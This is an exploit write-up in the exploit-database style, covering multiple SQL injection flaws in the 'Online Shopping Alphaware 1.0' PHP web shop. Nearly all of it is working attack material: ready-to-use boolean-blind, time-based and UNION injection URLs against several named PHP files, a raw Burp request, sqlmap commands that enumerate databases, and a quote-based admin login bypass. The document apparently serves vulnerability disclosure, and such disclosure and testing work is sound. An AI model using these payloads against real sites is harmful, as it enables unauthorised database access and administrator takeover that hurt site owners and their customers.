# Exploit Title: Online Shopping Alphaware 1.0 - Multiple SQL Injection Vulnerabilty # Date: 2020-8-4 # Exploit Author: Edo Maland # Vendor Homepage: https://www.sourcecodester.com/php/14368/online-shopping-alphaware-phpmysql.html # Software Link: https://www.sourcecodester.com/download-code?nid=14368&title=Online+Shopping+Alphaware+in+PHP%2FMysql # Version: 1.0 # Tested On Windows & Linux Server ------------------------------------------------------------------------------------------------------------------------------------- # Vulnerable file: summary.php # Vulnerable parameter : - tid # PoC URL : http://example.com/alphaware/summary.php?tid=1337 [SQLi] # Burpsuite Requests GET /alphaware/summary.php?tid=-3488%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x7171626a71%2C%28CASE%20WHEN%20%28VERSION%28%29%20LIKE%200x254d61726961444225%29%20THEN%201%20ELSE%200%20END%29%2C0x716b706b71%29%2CNULL%2CNULL--%20- HTTP/1.1 Cache-control: no-cache User-agent: Mozilla/5.0 (X11; U; Linux x86_64; ja; rv:1.9.1.4) Gecko/20091016 SUSE/3.5.4-1.1.2 Firefox/3.5.4 Cookie: PHPSESSID=tp5rtgrqhq6mtcgrlv2ouo583n Host: example.com Accept: */* Accept-encoding: gzip,deflate Connection: close # Payload Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://example.com/alphaware/summary.php?tid=73' AND 4766=4766 AND 'eIaZ'='eIaZ Vector: AND [INFERENCE] Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: http://example.com/alphaware/summary.php?tid=73' AND (SELECT 5482 FROM (SELECT(SLEEP(5)))PeLB) AND 'zQKr'='zQKr Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) Type: UNION query Title: Generic UNION query (NULL) - 5 columns Payload: http://example.com/alphaware/summary.php?tid=-4244' UNION ALL SELECT NULL,NULL,CONCAT(0x7171626a71,0x6573676f5948464d524243677248444168457a566250595976774178415053687041507a69507642,0x716b706b71),NULL,NULL-- - Vector: UNION ALL SELECT NULL,NULL,[QUERY],NULL,NULL-- - # Sqlmap sqlmap -u "http://example.com/alphaware/summary.php?tid=1337*" --dbs --random-agent -v 3 ------------------------------------------------------------------------------------------------------------------------------------- # Vulnerable file: confirm.php # Vulnerable parameter : - id # PoC URL : http://example.com/alphaware/admin/confirm.php?id=0*[SQLi] # Payload Parameter: #1* (URI) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: http://example.com/alphaware/admin/confirm.php?id=0' AND (SELECT 1002 FROM (SELECT(SLEEP(5)))Yjjs) AND 'uFRa'='uFRa # Sqlmap sqlmap -u "http://example.com/alphaware/admin/confirm.php?id=0*" --dbs --random-agent -v 3 ------------------------------------------------------------------------------------------------------------------------------------- # Vulnerable file: details.php # Vulnerable parameter : id # PoC URL : http://example.com/alphaware/details.php?id=1337 [SQLi] # Payload Parameter: #1* (URI) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: http://example.com/alphaware/details.php?id=1337' AND (SELECT 6801 FROM (SELECT(SLEEP(5)))ogoi) AND 'vASd'='vASd Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: http://example.com/alphaware/details.php?id=1337' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71766b7871,0x6350686f52454b775559486d4a456859414a61424a6c724b72624f6d4554555471764a4d724a726f,0x71716b7171),NULL,NULL-- - Vector: UNION ALL SELECT NULL,NULL,NULL,NULL,[QUERY],NULL,NULL-- - # Sqlmap sqlmap -u "http://example.com/alphaware/details.php?id=1337*" --dbs --random-agent -v 3 ------------------------------------------------------------------------------------------------------------------------------------- # Vulnerable file: confirm.php # Vulnerable parameter : - id # PoC URL : - http://example.com/alphaware/admin/confirm.php?id=0*[SQLi] - http://example.com/alphaware/admin/cancel.php?id=[SQLi] - http://example.com/alphaware/admin/receipt.php?tid=[SQLi] # Payload Parameter: #1* (URI) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: http://example.com/alphaware/admin/confirm.php?id=0' AND (SELECT 1002 FROM (SELECT(SLEEP(5)))Yjjs) AND 'uFRa'='uFRa # Sqlmap sqlmap -u "http://example.com/alphaware/admin/confirm.php?id=0*" --dbs --random-agent -v 3 ------------------------------------------------------------------------------------------------------------------------------------- URL : http://example.com/alphaware/admin/ Bypass Login Using SQL on Admin/Member Logging in with following details: Username : ' or ''=' Password : ' or ''='